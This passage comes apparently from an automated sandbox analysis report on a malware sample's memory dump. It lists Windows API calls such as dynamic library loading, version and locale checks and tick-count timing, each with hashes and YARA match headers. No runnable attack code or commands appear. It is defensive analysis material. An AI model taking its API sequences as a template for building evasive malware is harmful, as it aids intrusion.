                                                                        • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019), ref: 0306DD04
                                                                        • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000), ref: 0306DD10
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?,?,0306DEFB,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales), ref: 0306DD55
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameW$\$kernel32.dll
                                                                        • API String ID: 1930782624-3908791685
                                                                        • Opcode ID: 89fae09989609a3ed9c609f371affb3d98a7d34d305b5c10465f914848b423cf
                                                                        • Instruction ID: 58af39c9b3e388b5a1214691537c76853a1d5d15b6b57ba2ee38e86efa7b4278
                                                                        • Opcode Fuzzy Hash: 89fae09989609a3ed9c609f371affb3d98a7d34d305b5c10465f914848b423cf
                                                                        • Instruction Fuzzy Hash: A3419E75F02619DBCB10EBA8CC84ADEB3B9EF85310F1885A5C404EB259E7B4EE458A45
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,03525B9D), ref: 0352594B
                                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,03525B9D), ref: 03525975
                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,RtlGetVersion,00000000,03525AD5,?,?,?,?,?,?,03525B9D), ref: 035259C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Version$LibraryLoad
                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                        • API String ID: 192404683-1489217083
                                                                        • Opcode ID: 0e8e3d77889a4716915f84b18eecdc55e7c902c7f03c3e2ad0ed90dd85630465
                                                                        • Instruction ID: 642a4677dd9fa3a24086c52072225c1cb7d33573901b389b1a56e6c29ff1f108
                                                                        • Opcode Fuzzy Hash: 0e8e3d77889a4716915f84b18eecdc55e7c902c7f03c3e2ad0ed90dd85630465
                                                                        • Instruction Fuzzy Hash: 5451C238A05218EFCB14DBA8D585ADDBBF4FF4A311F6584E5E805A7260E3309E40DB50
                                                                        APIs
                                                                        • IsValidLocale.KERNEL32(?,00000002,00000000,0306D8CD,?,?,?,00000000), ref: 0306D812
                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0306D8CD,?,?,?,00000000), ref: 0306D82E
                                                                        • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0306D8CD,?,?,?,00000000), ref: 0306D83F
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Locale$Info$Valid
                                                                        • String ID:
                                                                        • API String ID: 1826331170-0
                                                                        • Opcode ID: eb9274765aba18f348be7395cbe40f41ac2b4bf620059cc79e26a587241bb401
                                                                        • Instruction ID: a8141b2bcd0fd12a2d5bd03a0eba5a394d7e8b5850408abc99931eec381a01d3
                                                                        • Opcode Fuzzy Hash: eb9274765aba18f348be7395cbe40f41ac2b4bf620059cc79e26a587241bb401
                                                                        • Instruction Fuzzy Hash: C8319D74A01708AFDB20EF64CC99BDFB7B9FB84701F0004A5E509AB268E6316E85CE11
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 0320C8ED
                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,user32.dll), ref: 0320C909
                                                                        • LoadLibraryW.KERNEL32(advapi32.dll,ntdll.dll,user32.dll), ref: 0320C925
                                                                        • LoadLibraryW.KERNEL32(shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C941
                                                                        • LoadLibraryW.KERNEL32(ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C95D
                                                                        • LoadLibraryW.KERNEL32(ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C979
                                                                        • LoadLibraryW.KERNEL32(wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C995
                                                                        • LoadLibraryW.KERNEL32(wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9AE
                                                                        • LoadLibraryW.KERNEL32(crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9C7
                                                                        • LoadLibraryW.KERNEL32(PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9E0
                                                                        • LoadLibraryW.KERNEL32(gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320C9F9
                                                                        • LoadLibraryW.KERNEL32(Iphlpapi.dll,gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0320CA12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID: Iphlpapi.dll$PSAPI.dll$advapi32.dll$crypt32.dll$gdi32.dll$ntdll.dll$ole32.dll$shell32.dll$user32.dll$wininet.dll$ws2_32.dll$wtsapi32.dll
                                                                        • API String ID: 1029625771-1098239973
                                                                        • Opcode ID: 96ad70e2ae53eae10ea8e2574660a34cb42b6e8cfb46d73e18924e5316c28263
                                                                        • Instruction ID: 4709318aca013496e334439604f749b4d0a19601e137aa8a64db4fc23a18df83
                                                                        • Opcode Fuzzy Hash: 96ad70e2ae53eae10ea8e2574660a34cb42b6e8cfb46d73e18924e5316c28263
                                                                        • Instruction Fuzzy Hash: F04119B8929328FFCB40EF6CD54198C7BF4EB4D200F5042A5D405BB29AD7705A89AF91
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB,?,?,00000000,00000000,00000000), ref: 0306DA9E
                                                                        • LeaveCriticalSection.KERNEL32(0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB,?,?,00000000,00000000), ref: 0306DAC2
                                                                        • LeaveCriticalSection.KERNEL32(0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB,?,?,00000000,00000000), ref: 0306DAD1
                                                                        • IsValidLocale.KERNEL32(00000000,00000002,0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB), ref: 0306DAE3
                                                                        • EnterCriticalSection.KERNEL32(0359EC14,00000000,00000002,0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB), ref: 0306DB40
                                                                        • LeaveCriticalSection.KERNEL32(0359EC14,0359EC14,00000000,00000002,0359EC14,0359EC14,00000000,0306DB84,?,?,?,00000000,?,0306E44C,00000000,0306E4AB), ref: 0306DB69
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                        • String ID: en-GB,en,en-US,
                                                                        • API String ID: 975949045-3021119265
                                                                        • Opcode ID: 3eb12a061f2c1c2b1356463029ef34f8794e7d4027da78510899cf028144a865
                                                                        • Instruction ID: f814d49785ce8ee9c425fa5765203b8fccbc534a669bf85fa9f938ac95b65598
                                                                        • Opcode Fuzzy Hash: 3eb12a061f2c1c2b1356463029ef34f8794e7d4027da78510899cf028144a865
                                                                        • Instruction Fuzzy Hash: 2421B468702740AEEB11F7789D52A9E72D8ABCBA00F545426E0809F25DDAB4CD4193A7
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 030687BD
                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 030687C3
                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 030687D6
                                                                        • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 030687DF
                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,03068856,?,00000000,?,GetLogicalProcessorInformation), ref: 0306880A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                        • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                        • API String ID: 1184211438-79381301
                                                                        • Opcode ID: 62b4c0e48f02b3535a526be214e180a8cf36d8d2605d903d864ac4c4a66f2a9d
                                                                        • Instruction ID: 77f90d906b9ea695d16621366e581ae884d36fda578ae0b200b34bc5b34d94ad
                                                                        • Opcode Fuzzy Hash: 62b4c0e48f02b3535a526be214e180a8cf36d8d2605d903d864ac4c4a66f2a9d
                                                                        • Instruction Fuzzy Hash: 35119075D02308AFDF90EBE5D805AADB7F8EF81700F18C4A5E8249B649D7788A80CB51
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03071868
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: 0146118b7b611e14a6bfd8fe03ff424689794cd5784454c8814d8f6cd8998f65
                                                                        • Instruction ID: 96c9db03e0bc678788c96025037932ee2718cf5bddce68a8242f142c9eba5045
                                                                        • Opcode Fuzzy Hash: 0146118b7b611e14a6bfd8fe03ff424689794cd5784454c8814d8f6cd8998f65
                                                                        • Instruction Fuzzy Hash: E4A16C76E02309AFDB18DFA8D880BEEB7F5EF88310F14411AE505AB2D4D770A946CB54
APIs
  • Part of subcall function 03068EBC: GetCurrentThreadId.KERNEL32 ref: 03068EBF
• GetTickCount.KERNEL32 ref: 03068A67
• GetTickCount.KERNEL32 ref: 03068A7F
• GetCurrentThreadId.KERNEL32 ref: 03068AAE
• GetTickCount.KERNEL32 ref: 03068AD9
• GetTickCount.KERNEL32 ref: 03068B10
• GetTickCount.KERNEL32 ref: 03068B3A
• GetCurrentThreadId.KERNEL32 ref: 03068BAA
Memory Dump Source
• Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_3060000_mama.jbxd
Yara matches
Similarity
• API ID: CountTick$CurrentThread
• String ID:
• API String ID: 3968769311-0
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?,00000000,00000000,03069CC6,03069CE0,?,?,030711E8), ref: 03069B2D
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?,00000000,00000000,03069CC6,03069CE0), ref: 03069B33
• GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?,00000000), ref: 03069B4E
• WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,03069BB2,?,?), ref: 03069B54
Strings
Memory Dump Source
• Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_3060000_mama.jbxd
Yara matches
Similarity
• API ID: FileHandleWrite
• String ID: Error$Runtime error at 00000000
• API String ID: 3320372497-2970929446
APIs
• LoadLibraryW.KERNEL32(user32.dll,03550B3B,00000000,03550EDA), ref: 0320C805
• LoadLibraryW.KERNEL32(kernel32.dll,user32.dll,03550B3B,00000000,03550EDA), ref: 0320C814
• LoadLibraryW.KERNEL32(ntdll.dll,kernel32.dll,user32.dll,03550B3B,00000000,03550EDA), ref: 0320C823
Strings
Memory Dump Source
• Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_3060000_mama.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: kernel32.dll$ntdll.dll$user32.dll
• API String ID: 1029625771-3818928520
APIs
• GetThreadUILanguage.KERNEL32(?,00000000), ref: 0306D975
• SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0306D9D3
• SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0306DA30
• SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0306DA63
  • Part of subcall function 0306D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0306D9E1), ref: 0306D937
  • Part of subcall function 0306D920: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0306D9E1), ref: 0306D954
Memory Dump Source
• Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_46_2_3060000_mama.jbxd
Yara matches
Similarity
• API ID: Thread$LanguagesPreferred$Language
• String ID:
• API String ID: 2255706666-0